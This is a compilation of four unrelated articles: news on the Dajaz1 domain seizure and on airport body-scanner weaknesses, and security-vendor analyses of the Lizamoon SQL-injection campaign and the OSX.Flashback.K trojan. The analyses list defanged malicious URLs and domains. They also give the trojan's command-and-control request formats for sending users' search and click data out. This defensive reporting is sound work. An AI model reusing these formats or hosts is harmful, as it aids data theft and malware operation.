Seized Hip-Hop Site Lashes Out At Feds, RIAA

For more than a year, and without explanation, the government redirected hip-hop site Dajaz1.com to this landing page.

The hip-hop music site the authorities shuttered for more than a year without explanation has lashed out at the recording industry and the federal government, likening the taking of the site to a “digital Guantanamo.”

“Seizing a blog for linking to four songs, even allegedly infringing ones, is equivalent to seizing the printing press of The New York Times because the newspaper, in its concert calendar, refers readers to four concerts where the promoters of those concerts have failed to pay ASCAP for the performance licenses,” Andre Nasib, the site’s owner, wrote in a blog post Monday on the popular dajaz1.com site.

Nasib had originally declined comment when Wired disclosed the backstory of the seizure on Thursday.

According to court records obtained by Wired, federal authorities seized the dajaz1.com site based on assertions from the Recording Industry Association of America that it was linking to four “pre-release” music tracks in November, 2010. The authorities gave it back nearly 13 months later without filing civil or criminal charges because of apparent recording industry delays in confirming infringement, according to the court records, which were unsealed by the Electronic Frontier Foundation, the First Amendment Coalition and Wired.

The records illustrated a secret government process in which a judge granted the government repeated time extensions to build a civil or criminal case against dajaz1.com, one of about 750 domains the government has seized in the last two years in a program known as Operation in Our Sites.

Immigrations and Customs Enforcement, a branch of the Department of Homeland Security, has the power to seize web domains engaged in infringing activity under the same forfeiture laws used to seize property like houses, cars and boats allegedly tied to illegal activity such as drug running or gambling.

The authorities seized the site in November 2010 on the word of the RIAA that four songs linked to on the site were unauthorized, the records show. Yet nearly a year later, in September 2011, the government was secretly seeking its third time extension to build its case, largely because it was still waiting for the recording industry to produce evidence, the records show.

All the while, the site’s owner and his attorney were left out of the loop, as the court record was sealed from them and the public. The Dajaz1 site was redirected to a government landing page saying it was seized by customs officials.

The site claims the four songs by Jamie Foxx, Chris Brown, Nelly and Reek Da Villian at the center of the dispute were provided to it by the recording industry.

Federal prosecutors in Los Angeles where the case was handled have declined comment. The Recording Industry Association of America initially declined comment. In an e-mail to Wired late Sunday, however, the RIAA said it “made every attempt” to to assist the investigation “in a complete and prompt manner.”

The RIAA has repeatedly attacked the site for allegedly facilitating wanton copyright infringement of pre-release music, saying dajaz1.com has released “thousands” of unauthorized songs.

Dajaz1 blasted back Monday, saying the “RIAA’s grand and sweeping attacks on dajaz1.com suggest that the RIAA’s powers of demonization far exceed its ability to substantiate its malicious statements with specific, credible facts.”

Lizamoon Mass SQL-Injection: Tried and Tested Formula

Analysis: Kevin Savage

Following on from our recent blog post on malicious Web injects affecting distribution of a malicious Android application, here is a more traditional type – but on a huge scale. Those of us in the security industry are well aware of a certain email address — [email protected] — which registers domains consistently used in mass SQL-injection attacks against vulnerable Web applications. This mass SQL-injection of a malicious iFrame was dubbed Lizamoon (as a result of the domain name used during similar attacks back in 2011).

Although the domains have changed, the technique remains the same: exploit vulnerable sites on a large scale with an SQL-injection attack, which will then direct users to websites containing malicious code. The current wave of injection is considerable, if we base this on the search results Google has indexed:

The IP address 31.210.100.242 has been identified in the attack and has four domains currently associated with it:

  • hgbyju.com
  • hnjhkm.com
  • nikjju.com
  • njukol.com

If you have visited a site with the injected iFrame, the following events will take place:

Infected site
[REDIRECTS] →
[hxxp]://njukol.com/r.php
[REDIRECTS] →
[hxxp]://www3.safe-defensefu.com/?f1hlu4a=[ENCODED DATA]
[REDIRECTS] →
[hxxp]://www1.powermb-security.it.cx/ntzjc62?vjgtl=[ENCODED DATA]
[REDIRECTS] →
[hxxp]://www1.powermb-security.it.cx/i.html

The i.html file serves up two exploits:

  1. CVE-2010-0188 – Trojan.Pidief

    If vulnerable, this exploit attempt to download and execute a file from a location which no longer resolves.
     

  2. CVE-2012-0507 – Trojan.Maljava

    If vulnerable, this exploit will successfully download and execute a Backdoor.Trojan from the following URL:

    [hxxp]://www2.smartqz-army.dnset.com

We are currently analyzing this file and will provide further updates once we’ve completed the analysis.
 

Protection

Symantec protects you against this attack with the following IPS signatures:

The exploits used in this attack are known vulnerabilities and already patched. Please ensure you apply the latest patches and have your antivirus up to date.

Homeland Security Concedes Airport Body Scanner ‘Vulnerabilities’

TSA is moving toward body scanners displaying generic human outlines. Photo: TSA

Federal investigators “identified vulnerabilities in the screening process” at domestic airports using so-called “full body scanners,” according to a classified internal Department of Homeland Security report.

DHS has spent nearly $90 million replacing traditional magnetometers with controversial X-ray body scanning machines that are intended to detect items that could be missed by a metal detector.

Exactly how bad the body scanners are is not being divulged publicly, but the Inspector General report made eight separate recommendations on how to improve screening.

The news comes as authorities are examining an underwear bomb, allegedly seized by the CIA in Yemen as it allegedly thwarted an Al-Qaida plot to destroy a U.S.-bound airplane, according to The Associated Press. Authorities are now looking to determine if the bomb could have passed through airport screeners without being detected.

Meanwhile, an unclassified version of the Inspector General report, unearthed Friday by the Electronic Information Privacy Center, may give credence to a recent YouTube video allegedly showing a 27-year-old Florida man sneaking a metallic object through two different Transportation Security Administration body scanners at American airports.

The TSA agreed with all of the Inspector General’s recommendations. The Inspector General did not immediately respond to a request for comment.

In March, meanwhile, a TSA spokeswoman said “These machines are safe” when asked to address a video by Jonathan Corbett, of Miami Beach, who allegedly had discovered a method tobeat the body scanners, which number 600 and are in about 140 U.S. airports. A brief YouTube video allegedly shows Corbett, who had sewn a pocket to the side of his shirt, getting past two body scanners with a metallic object in that pocket.

It was not immediately known when the TSA published its unclassified summary, TSA Penetration Testing of Advanced Imaging Technology. It comes with a “November 2011″ date and can be found on the DHS Office of Inspector General website under the heading “OIG Reports: Fiscal Year 2012.”

It’s not the first time the body scanners, produced by Rapiscan and L-3 Communications, have come under attack. In a three-part series last year, Wired reported that, indeed, there were suspected security flaws with them. Even the Government Accountability Office — Congress’ investigative arm — said the devices might be ineffective. And the Journal of Transportation Security suggested terrorists might fool the Rapiscan machines by taping explosive devices to their stomachs.

The unclassified summary said the government has spent $87 million on the scanners, which includes $10 million for “installation and maintenance.” To quiet privacy concerns, the authorities are also spending $7 million to “remove the human factor from the image review process” and replace the passenger’s image with an avatar.

The unclassified version said the “quantitative and qualitative results of our testing are classified.”

Passengers who refuse to go through the machines are subject to intense physical patdowns. Many have complained the process includes being sexually groped.

Amie Stepanovich, an EPIC attorney, said the group would file a Freedom of Information Act claim in a bid to get access to the full report. “This involves a program that is important to the public,” she said in a telephone interview.

EPIC had sued the government, claiming the machines were an unconstitutional breach of Americans’ privacy. A federal appeals court sided with the authorities, although the court said the government did not adhere to the law when it began implementing the machines at airports as early as 2007.

OSX.FlashBack.K – An Overview and its Inner Workings

In our previous blogs, [1], [2], [3], and [4], we described how a computer may become infected with OSX.Flashback.K and provided various statistics about infected computers. The purpose of this blog is to describe the inner workings of the threat.

The ultimate goal of the OSX.Flashback.K Trojan is to generate money through ad-clicking. The threat employs multiple components in order to achieve this goal. The image below illustrates the various stages involved once OSX.Flashback.K gets downloaded on to a user’s computer through a drive-by-download of the malicious JAR file.
 

Figure 1. Threat overview
 

The malicious JAR file exploits the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507) in order to drop an embedded MachO-1 executable file onto the computer.

This initial dropped MachO binary file is a downloader component that contacts a server to download additional binary files.

The server that the downloader component contacts is generated by a Domain Name Generation algorithm (DGA-1)**. DGA-1 uses the current date along with hard-coded values to generate 30 domains per day using the following top-level domains (TLD)[3]:

  • .com
  • .in
  • .info
  • .kz
  • .net

The downloaded binary file contains two MachO binaries: a loader (MachO-2) and an ad-clicking payload (MachO-3). Both of the binaries are then decrypted and dropped on to the compromised computer. The MachO-2 binary file is installed in such a way that it is ultimately loaded as part of the Web browser. This is achieved by modifying either of the following property list files depending upon the privilege or permissions it has in the computer:

  • /Applications/Safari.app/Contents/Info.plist
  • ~/.MacOSX/environment.plist

Upon execution, the MachO-2 binary loads the MachO-3 binary and hooks the CFReadStreamRead() and CFWriteStreamWrite() APIs in order to intercept Web browser traffic for the purpose of injecting advertisements.
 

Figure 2. Hooking procedure by Loader (MachO-1)
 

The threat then monitors a user’s outgoing network data to see if the user either clicks on a search query or clicks on an advertisement, as shown in the following image.
 

Figure 3. Web browser traffic interception
 

The threat is interested in two types of action that the user may perform:

  1. Clicking on a Google Advertisement
  2. Performing a search in a search engine

The threat attempts to identify any of the following parameters:

  • GET /url?
  • google
  • q=
  • sa=
  • ved=
  • usg=

Each of these is typically found when a user clicks on a Google advertisement. If none of the domains from its whitelist are present in the query, then the threat gathers the parameters from the query, encodes them using base64, and sends the information to a command-and-control (C&C) server in the following form:

hxxp://[VERIFIED-C&C-SERVER]/click?data=[BASE64 CLICK PARAMATERS]

If the threat determines that the query is part of a regular Google search, it obtains the search query and sends it to the C&C server in the following form [4]:

hxxp://[VERIFIED C&C SERVER]search?q=[BASE64 QUERY]&ua=[BASE64 USER AGENT]&al=[BASE64 ACCEPTED LANGUAGE]&cv=[CLIENT VERSION]

The "User-Agent:" of the HTTP header in the above request contains the Base64-encoded PlatformUUID of the user’s computer. This is used so the attacker can verify that the request is from a legitimate compromised computer and so the attacker can also encrypt the response using the PlatformUUID.

The “verified C&C server” responds to this query with the ad-clicking URLs that will be injected into the user’s browser by using the hooked CFReadStreamRead() API code in the MachO-3 binary. By doing this, the user sees search results in response to their search query, but the search results are now from pay-per-click services the OSX.Flashback.K author has signed up for.

By replacing search results in the manner as shown above, the malware author will now receive money for every click performed by the user.
 

Verification of the C&C server

Since it is common for malware C&C servers to be taken down or hijacked by antivirus companies and law enforcement, the OSX.Flashback authors have incorporated an owner verification scheme into the threat.

For owner verification, the threat sends a query to all of the domains from the generated domain list (discussed later) in the following form:

GET /owncheck/ HTTP/1.1
Host: [C&C SERVER DOMAIN]
User-Agent: BASE64[PLATFORM UUID]
Connection: close

In response, the malicious server sends two parts of the data in the following form:

BASE64[Sha1([SERVER DOMAIN])]|BASE64[RSA SIGNATURE]

The first part is the sha1() value of the server domain and the second part is the RSA signature that is signed over the first part using an RSA private key. This procedure authenticates that the Flashback authors have control over the queried domain as they own the RSA private key.

Once verified, the threat checks for an update to the threat with the following query:

GET /auupdate/ HTTP/1.1
Host: [Verified C&C SERVER DOMAIN]
User-Agent: BASE64[COMPROMISED COMPUTERINFORMATION]
Connection: close

Note: [COMPROMISED COMPUTER INFORMATION] from above is of the form shown below.
 

Figure 4. [COMPROMISED COMPUTER INFORMATION] format
 

This is how a new version of the threat is delivered by the attacker.
 

Twitter hashtag search and Domain Generation Algorithm (DGA-2)

Apart from a list of hard-coded C&C server lists, the threat can update its C&C server address in one of the following two forms:

  1. Through a C&C server address obtained from a specific Twitter message having a specific hashtag in it. This Twitter message is found by a Twitter search, querying for specific hashtags. These hashtags are generated based on current date, by using values (day, month, year) as an index in a list of 34 predefined four letter strings, forming a 12 character hashtag.
     
  2. Through a C&C server generated using Domain Generation algorithm (DGA-2) using the current date, by using values (day, month, year) as an index in a list of 34 pre-defined four letter strings, forming a 12 character domain string and combining them with the 26 pre-defined top-level domains shown below.

 

Figure 5. 26 pre-defined top-level domains
 

Although the final motive behind all of this is to serve advertisements through pay-per-click services and to generate money, the use of techniques like Domain Generation Algorithm and public key cryptography demonstrates that the author is well-versed in the creation of malware.

Perhaps this experience comes from previous malware authoring in other operating systems?

As always, please keep your antivirus and other installed software up to date while we continue to monitor the threat landscape for more to come.

**We have seen two types of dropped MachO-1 downloader, one with a hard-coded server address to contact and another with a Domain Generation Algorithm (DGA-1) embedded within, this post talks about the later.